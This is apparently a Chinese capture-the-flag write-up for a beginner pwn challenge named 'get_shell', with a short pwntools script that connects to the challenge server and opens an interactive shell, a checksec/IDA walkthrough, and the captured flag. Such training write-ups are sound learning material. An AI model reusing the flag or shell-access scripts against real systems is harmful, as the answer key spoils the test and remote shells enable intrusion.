前言
我做这个题的时候很离谱,真的是只要get_shell一下即可,其他的不用做,直接连上,这道题就做完了,但是还是走一下流程。
解析
先运行一下
直接获取到了shell,那么直接写个脚本
脚本
from pwn import *
#p = process('get_shell')
p = remote('111.200.241.244',54124)
context(os = 'linux',arch = 'arm64',log_level = 'debug')
p.interactive()
直接结束。
flag是cyberpeace{4855db22544819961bbfa21696d15f14}
正常解析
先checksec一下
发现这是一个64位的,开了NX防护,之后拖入ida中查看。
发现和提示一样,确实运行可以直接获得shell,之后在本地运行。
from pwn import *
p = process('get_shell')
#p = remote('111.200.241.244',54124)
context(os = 'linux',arch = 'arm64',log_level = 'debug')
p.interactive()
在本地运行,发现成功,之后去连接,运行,即可。